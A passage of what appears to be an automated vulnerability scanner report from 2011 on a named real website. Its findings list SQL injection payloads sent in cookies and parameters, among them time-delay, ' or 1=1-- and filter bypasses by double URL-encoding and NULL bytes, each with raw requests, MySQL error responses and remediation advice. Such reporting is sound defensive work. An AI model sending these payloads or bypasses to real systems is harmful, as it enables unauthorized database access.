User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:48:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19384

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:48:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.4. http://fanpeeps.com/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2')waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17473

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.5. http://fanpeeps.com/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the __utmb cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19466

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 37908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.6. http://fanpeeps.com/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload 11256744'%20or%201%3d1--%20 was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?pid=&idol=&action=tweets HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.130537638011256744'%20or%201%3d1--%20;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19582

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.7. http://fanpeeps.com/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload )waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936)waitfor%20delay'0%3a0%3a20'--; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.8. http://fanpeeps.com/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%00'; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17944

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%00''; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.9. http://fanpeeps.com/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936'; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19385

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936''; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 36516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.10. http://fanpeeps.com/ [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:43:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17317

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.11. http://fanpeeps.com/ [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'%20and%201%3d1--%20; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17308

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.12. http://fanpeeps.com/ [idol parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The idol parameter appears to be vulnerable to SQL injection attacks. The payload 67989367'%20or%201%3d1--%20 was submitted in the idol parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?pid=&idol=67989367'%20or%201%3d1--%20&action=tweets HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19647

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.13. http://fanpeeps.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /??1',0,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:45:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17361

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.14. http://fanpeeps.com/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?action=news&pid=18'&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10077

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.15. http://fanpeeps.com/bg2.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /bg2.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload " was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /bg2.jpg" HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.1.10.1305373774

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 11:50:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17354

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.16. http://fanpeeps.com/bg2.jpg [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /bg2.jpg

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /bg2.jpg HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/?action=news&pid=18&iid=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1'; __utmc=181893936

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:32:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17390

<br />
